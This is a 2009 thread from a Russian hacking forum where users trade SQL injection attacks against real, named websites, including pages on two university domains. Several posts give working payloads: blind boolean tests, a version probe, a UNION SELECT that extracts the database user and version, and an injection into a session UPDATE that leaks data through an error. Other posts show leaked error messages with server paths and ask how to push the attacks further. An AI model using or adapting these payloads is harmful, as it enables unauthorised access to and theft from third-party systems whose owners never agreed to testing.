 |
|
21.05.2009, 21:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
А чо тут подбирать-то:
Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+order+by+1
Но видать запрос сложный, участвует ни одна таблица только, но скуля есть, хоть и блайнд:
Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=0
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=1
4-ая ветка:
Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13+and+substring(version(),1,1)=4
|
|
|
22.05.2009, 02:54
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2'
это слепая инъекция?
|
|
|
|
22.05.2009, 03:58
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
да нет, зрячая)
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(),version())+using+latin1),4,5,6,7,8/*
|
|
|
|
22.05.2009, 17:49
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?
Ошибка в подвале страницы. |
|
|
|
22.05.2009, 19:57
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Сообщение от InFlame
Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?
Ошибка в подвале страницы.Можно даже вывод сделать
[query: update session set value='last_url|s:51:"/news/news-203.html?=1',session_name=user(),value='";', update_date=now() where session_name='orica7dsmq18otn85ojtmvama3'
error: Duplicate entry 'convex@localhost' for key 1
in file: /home/convex/cms/inc/auto/session.inc at line: 42]
Когда идет упдейт сессии:
_http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='
|
|
|
|
23.05.2009, 01:31
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
не работают "комментарии" в MySQL
нашел сайтик там в поле логина нет проверки на '.
ну и выдает при запросе 'union select 1/*
Код:
Context info for the following error/warning:
Error: 1024, Query(r) failed:
SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
With result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381
call: DB->queryex("r", "SELECT u.email, u.userid
FROM user u
WHERE u.username='1' union select 1/*'
AND u.email=''")
и так дальше в таком же духе... не --, не # не помогает... что можно попробывать? |
|
|
|
23.05.2009, 01:40
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
|
|
|
|
23.05.2009, 01:54
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
Сообщение от slammer
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
|
|
|
|
23.05.2009, 01:58
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
http://events.wayne.edu/index.php?cat=24'+order+by+2/*
при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...
|
|
|
|
23.05.2009, 01:58
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
2slammer
http://www.phpclub.ru/mysql/doc/comments.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
